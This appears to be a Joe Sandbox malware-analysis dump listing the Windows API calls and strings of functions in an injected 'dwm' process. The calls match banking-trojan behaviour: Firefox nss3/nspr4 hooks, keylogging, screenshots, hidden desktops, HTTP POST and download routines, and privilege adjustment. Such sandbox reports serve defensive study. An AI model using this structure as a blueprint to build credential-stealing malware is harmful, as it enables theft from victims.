GetWindowThreadProcessId.USER32(?,?), ref: 00635CB4
ResetEvent.KERNEL32(00000010), ref: 00635D03
PostMessageW.USER32(?,?,?,00000010), ref: 00635D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00635D35

Part of subcall function 00635B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 00635B40
Part of subcall function 00635B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00635B9A
Part of subcall function 00635B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00635BD6
Part of subcall function 00635B28: TerminateProcess.KERNEL32(?,00000000), ref: 00635BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 00635D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00635D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00635D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00635DA7

Part of subcall function 00644DCA: CloseHandle.KERNEL32(00000000), ref: 00644DD9
Part of subcall function 00644DCA: CloseHandle.KERNEL32(00000000), ref: 00644DE2

IntersectRect.USER32(?,?), ref: 00635DC7
FillRect.USER32(?,?,00000006), ref: 00635DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00635DED

Part of subcall function 00647A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00647AB5

Part of subcall function 00646B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00642E87,?,19367401,?,00000001,8889347B,00000002), ref: 00646BA9
Part of subcall function 00646B9E: CloseHandle.KERNEL32(00000000), ref: 00646BB4

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 00647AF0: WindowFromPoint.USER32(?,?), ref: 00647B0C
Part of subcall function 00647AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00647B3D
Part of subcall function 00647AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 00647B61
Part of subcall function 00647AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00647B72
Part of subcall function 00647AF0: GetWindowLongW.USER32(?,000000F0), ref: 00647B8F
Part of subcall function 00647AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00647B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 0063B6B6
GetParent.USER32(00000000), ref: 0063B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 0063B6FD
IsWindow.USER32(?), ref: 0063B720

Part of subcall function 0063B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B0B3
Part of subcall function 0063B0AD: ReleaseMutex.KERNEL32(?), ref: 0063B0E7
Part of subcall function 0063B0AD: IsWindow.USER32(?), ref: 0063B0EE
Part of subcall function 0063B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0063B108
Part of subcall function 0063B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0063B110

GetWindowInfo.USER32(00000000,?), ref: 0063B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0063B8AD

Part of subcall function 0063B31C: GetAncestor.USER32(?,00000002), ref: 0063B345
Part of subcall function 0063B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0063B370
Part of subcall function 0063B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 0063B3B2
Part of subcall function 0063B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0063B448
Part of subcall function 0063B31C: PostMessageW.USER32(?,00000112,?,?), ref: 0063B49B
Part of subcall function 0063B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0063B4DA

Part of subcall function 0063DCA2: GetClassNameW.USER32(006A01CA,?,00000101), ref: 0063DCBD

Part of subcall function 0063B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B130
Part of subcall function 0063B11C: ReleaseMutex.KERNEL32(?), ref: 0063B14F
Part of subcall function 0063B11C: GetWindowRect.USER32(?,?), ref: 0063B15C
Part of subcall function 0063B11C: IsRectEmpty.USER32(?), ref: 0063B1E0
Part of subcall function 0063B11C: GetWindowLongW.USER32(?,000000F0), ref: 0063B1EF
Part of subcall function 0063B11C: GetParent.USER32(?), ref: 0063B205
Part of subcall function 0063B11C: MapWindowPoints.USER32(00000000,00000000), ref: 0063B20E
Part of subcall function 0063B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0063B232

Strings

<, xrefs: 0063B769
, xrefs: 0063B654
@, xrefs: 0063B806

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00634DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 00642507: CreateMutexW.KERNELBASE(00652C30,00000000,?,?,?,?,?), ref: 00642528

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 00634E28
CloseHandle.KERNEL32(?), ref: 00634F89

Part of subcall function 0063E959: CreateMutexW.KERNELBASE(00652C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00634E69,?,?,?,743C152E,00000002), ref: 0063E97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00634EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 00634EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00634F1A

Part of subcall function 006467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 006467CC

Part of subcall function 00644DF0: CreateThread.KERNEL32(00000000,?,00000000,0063748F,00000000,0063748F), ref: 00644E04
Part of subcall function 00644DF0: CloseHandle.KERNEL32(00000000), ref: 00644E0F

accept.WS2_32(?,00000000,00000000), ref: 00634F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 00634F59

Part of subcall function 0064675E: shutdown.WS2_32(?,00000002), ref: 00646766
Part of subcall function 0064675E: #3.WS2_32(?), ref: 0064676D

CloseHandle.KERNEL32(?), ref: 00634F7A

Part of subcall function 00646B8E: ReleaseMutex.KERNEL32(00000000,00643021,?,?,?), ref: 00646B92

Part of subcall function 0063E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0063E8E0

Part of subcall function 00634C68: getsockname.WS2_32(?,?,?), ref: 00634CBE
Part of subcall function 00634C68: CloseHandle.KERNEL32(?), ref: 00634CE2

Strings

K2w, xrefs: 00634EC7

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00648AE4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109

APIs

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00648B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00648B4A

Part of subcall function 00648AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00648B94
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00648BC1
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?), ref: 00648BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00648C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 00648C31

Strings

Fsd, xrefs: 00648BF3
Fsd, xrefs: 00648BBE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006450A3, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00652000,8404F700,00000000), ref: 006450EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00645112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00645137
InternetCloseHandle.WININET(00000000), ref: 0064514F

Strings

POST, xrefs: 006450C9
GET, xrefs: 006450D0, 006450E7
HTTP/1.1, xrefs: 006450DF
nj<jFj, xrefs: 00645137
Connection: close, xrefs: 00645103, 00645110

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064D865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 0064D88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0064D89D
GetProcessWindowStation.USER32 ref: 0064D8AE

Part of subcall function 0064D83D: GetProcessWindowStation.USER32 ref: 0064D841
Part of subcall function 0064D83D: SetProcessWindowStation.USER32(00000000), ref: 0064D855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0064D8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0064D8FD
GetCurrentThreadId.KERNEL32(?,?,?,0063731A,?,2937498D,?,00000000), ref: 0064D909
GetThreadDesktop.USER32(00000000), ref: 0064D910

Part of subcall function 0064D7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,0064D84D,00000000,?,?,?,0063731A,?,2937498D,?), ref: 0064D81D

SetThreadDesktop.USER32(00000000), ref: 0064D922
CloseDesktop.USER32(00000000), ref: 0064D934
CloseWindowStation.USER32(?), ref: 0064D94F

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 00642507: CreateMutexW.KERNELBASE(00652C30,00000000,?,?,?,?,?), ref: 00642528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 0063775B
SetThreadPriority.KERNEL32(00000000), ref: 00637762

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

WaitForSingleObject.KERNEL32(0000EA60), ref: 00637780

Part of subcall function 00649A9E: RegOpenKeyExW.ADVAPI32(80000001,00653EC0,00000000,00000001,?), ref: 00649ADD

CreateMutexW.KERNEL32(00652C30,00000001,?,20000000), ref: 00637843
GetLastError.KERNEL32 ref: 00637853
CloseHandle.KERNEL32(00000000), ref: 00637861

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

Part of subcall function 00644DF0: CreateThread.KERNEL32(00000000,?,00000000,0063748F,00000000,0063748F), ref: 00644E04
Part of subcall function 00644DF0: CloseHandle.KERNEL32(00000000), ref: 00644E0F

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 00637919

Part of subcall function 00646B8E: ReleaseMutex.KERNEL32(00000000,00643021,?,?,?), ref: 00646B92

Strings

Global\%08X%08X%08X, xrefs: 0063781D

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064C912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 0064C929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0064D2A8), ref: 0064C955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?), ref: 0064C96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?), ref: 0064C984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?,00000000), ref: 0064CA0D

Part of subcall function 00644A87: GetCurrentThread.KERNEL32(00000020,00000000,0064C9A1,00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A97
Part of subcall function 00644A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A9E
Part of subcall function 00644A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0064C9A1,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644AB0
Part of subcall function 00644A87: LookupPrivilegeValueW.ADVAPI32(00000000,0064C9A1,?), ref: 00644AD4
Part of subcall function 00644A87: AdjustTokenPrivileges.ADVAPI32(0064C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00644AE9
Part of subcall function 00644A87: GetLastError.KERNEL32 ref: 00644AF3
Part of subcall function 00644A87: CloseHandle.KERNEL32(0064C9A1), ref: 00644B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?,00000000), ref: 0064C9A1

Part of subcall function 0064C8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0064C9FB,00000000,?,?,?), ref: 0064C8C6
Part of subcall function 0064C8A1: CloseHandle.KERNEL32(?), ref: 0064C907

Strings

SeTcbPrivilege, xrefs: 0064C997
.exe, xrefs: 0064C93B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064BD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

EnterCriticalSection.KERNEL32(00653FE4), ref: 0064BDB7
LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064BDE5
EnterCriticalSection.KERNEL32(00653FE4), ref: 0064BE09

Part of subcall function 006414C3: InternetCrackUrlA.WININET ref: 006417AC
Part of subcall function 006414C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 006417CA
Part of subcall function 006414C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 006418E4
Part of subcall function 006414C3: EnterCriticalSection.KERNEL32(00652AC8), ref: 00641910
Part of subcall function 006414C3: LeaveCriticalSection.KERNEL32(00652AC8,?,?), ref: 0064194D

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

Part of subcall function 0064835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 006483B8

Part of subcall function 006440F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0064410D

Part of subcall function 00643346: HeapAlloc.KERNEL32(00000008,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?,?), ref: 00643368
Part of subcall function 00643346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?), ref: 00643379

LeaveCriticalSection.KERNEL32(00653FE4,00000000,?,00000000), ref: 0064C04C

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C06B
LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C078

Strings

0, xrefs: 0064BF31
%x, xrefs: 0064BF11
Content-Length, xrefs: 0064BF55

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00639489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 006474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00637194,?,?,00000104,.exe,00000000), ref: 006474F4
Part of subcall function 006474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00637194,?,?,00000104), ref: 00647575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 006394EF

Part of subcall function 0063929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 006392D4
Part of subcall function 0063929D: StrStrIW.SHLWAPI(?,?), ref: 0063935C
Part of subcall function 0063929D: StrStrIW.SHLWAPI(?,?), ref: 0063936D
Part of subcall function 0063929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00639389
Part of subcall function 0063929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 006393A7
Part of subcall function 0063929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 006393C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0063950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00639582

Part of subcall function 00648AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00648B23
Part of subcall function 00648AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00648B4A
Part of subcall function 00648AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00648B94
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00648BC1
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?), ref: 00648BF1
Part of subcall function 00648AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00648C1F
Part of subcall function 00648AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00648C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0063961F

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

$, xrefs: 00639552
&, xrefs: 00639560
#, xrefs: 00639567

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064AEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 0064B053

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

EnterCriticalSection.KERNEL32(00653FB4), ref: 0064AF36
LeaveCriticalSection.KERNEL32(00653FB4), ref: 0064AFD9

Part of subcall function 0063EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0063EA43
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0063EA54
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0063EA61
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0063EA6E
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0063EA7B
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0063EA88
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0063EA95
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0063EAA2
Part of subcall function 0063EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 0063EAEA
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0063EAF5
Part of subcall function 0063EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0063EB07
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0063EB12
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0063EB1E
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0063EB2B
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0063EB38
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0063EB45
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0063EB52
Part of subcall function 0063EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0063EB5F
Part of subcall function 0063EA11: FreeLibrary.KERNEL32(00000000), ref: 0063EE9C
Part of subcall function 0063EA11: FreeLibrary.KERNEL32(?), ref: 0063EEA6
Part of subcall function 0063EA11: FreeLibrary.KERNEL32(00000000), ref: 0063EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 0064AF9B

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

GetKeyboardState.USER32(?), ref: 0064AFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0064B01B

Part of subcall function 0064AD5F: EnterCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AD7C
Part of subcall function 0064AD5F: LeaveCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AD9D
Part of subcall function 0064AD5F: EnterCriticalSection.KERNEL32(00653FB4,?,?,?,?,0064B052,?), ref: 0064ADAE
Part of subcall function 0064AD5F: LeaveCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AE47

Strings

, xrefs: 0064B039

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006451FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0064521D

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 0064524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00645267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00645282
FlushFileBuffers.KERNEL32(00000000), ref: 006452A2

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

CloseHandle.KERNEL32(00000000), ref: 006452B5

Part of subcall function 00648716: SetFileAttributesW.KERNEL32(00000080,00000080,0064B4CD,?), ref: 0064871F
Part of subcall function 00648716: DeleteFileW.KERNEL32(?), ref: 00648729

Strings

PjZjdj2jnj<jFj, xrefs: 00645267

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064C5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0064C5ED
EnterCriticalSection.KERNEL32(0065400C), ref: 0064C620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0064C640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 0064C64C

Part of subcall function 0063C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,006420A9), ref: 0063C111
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,006420A9), ref: 0063C125
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0063C132
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0063C13F
Part of subcall function 0063C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0063C14C

LeaveCriticalSection.KERNEL32(0065400C), ref: 0064C669

Strings

nss3.dll, xrefs: 0064C646
nspr4.dll, xrefs: 0064C63A

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006469AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(00652C3C,00000001,00000000,006422ED,?,?,00000000), ref: 006469B4
SetSecurityDescriptorDacl.ADVAPI32(00652C3C,00000001,00000000,00000000,?,?,00000000), ref: 006469C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 006469DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 006469F7
SetSecurityDescriptorSacl.ADVAPI32(00652C3C,?,?,?,?,?,00000000), ref: 00646A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00646A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 006469D6

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064B58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(00653FE4,76C61857,0063C185,00652360), ref: 0064B5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0064B5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 0064B5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 0064B602

Strings

PR_GetNameForIdentity, xrefs: 0064B5BE
PR_SetError, xrefs: 0064B5E0
PR_GetError, xrefs: 0064B5F2

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00637206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 00646444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00646463
Part of subcall function 00646444: freeaddrinfo.WS2_32(?,?,?,?,?,00637284,?), ref: 006464B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 006372EB
SetThreadPriority.KERNEL32(00000000), ref: 006372F2

Part of subcall function 0064D865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 0064D88A
Part of subcall function 0064D865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0064D89D
Part of subcall function 0064D865: GetProcessWindowStation.USER32 ref: 0064D8AE
Part of subcall function 0064D865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0064D8E9
Part of subcall function 0064D865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0064D8FD
Part of subcall function 0064D865: GetCurrentThreadId.KERNEL32(?,?,?,0063731A,?,2937498D,?,00000000), ref: 0064D909
Part of subcall function 0064D865: GetThreadDesktop.USER32(00000000), ref: 0064D910
Part of subcall function 0064D865: SetThreadDesktop.USER32(00000000), ref: 0064D922
Part of subcall function 0064D865: CloseDesktop.USER32(00000000), ref: 0064D934
Part of subcall function 0064D865: CloseWindowStation.USER32(?), ref: 0064D94F

Part of subcall function 0063DD09: TlsAlloc.KERNEL32(00652868,00000000,0000018C,00000000,00000000), ref: 0063DD22
Part of subcall function 0063DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0063DD4A
Part of subcall function 0063DD09: CreateEventW.KERNEL32(00652C30,00000001,00000000,?,84889912,?,00000001), ref: 0063DD74
Part of subcall function 0063DD09: CreateMutexW.KERNEL32(00652C30,00000000,?,18782822,?,00000001), ref: 0063DD97
Part of subcall function 0063DD09: CreateFileMappingW.KERNEL32(00000000,00652C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0063DDC2
Part of subcall function 0063DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0063DDD8
Part of subcall function 0063DD09: GetDC.USER32(00000000), ref: 0063DDF5
Part of subcall function 0063DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0063DE15
Part of subcall function 0063DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0063DE1F
Part of subcall function 0063DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0063DE32
Part of subcall function 0063DD09: ReleaseDC.USER32(00000000,?), ref: 0063DE56
Part of subcall function 0063DD09: CreateMutexW.KERNEL32(00652C30,00000000,?,1898B122,?,00000001,006528B8,?,00000102,006528A4,00652E70,00000010,?,?), ref: 0063DF00
Part of subcall function 0063DD09: GetDC.USER32(00000000), ref: 0063DF15
Part of subcall function 0063DD09: CreateCompatibleDC.GDI32(00000000), ref: 0063DF23
Part of subcall function 0063DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0063DF3A
Part of subcall function 0063DD09: SelectObject.GDI32(00000000,00000000), ref: 0063DF4D
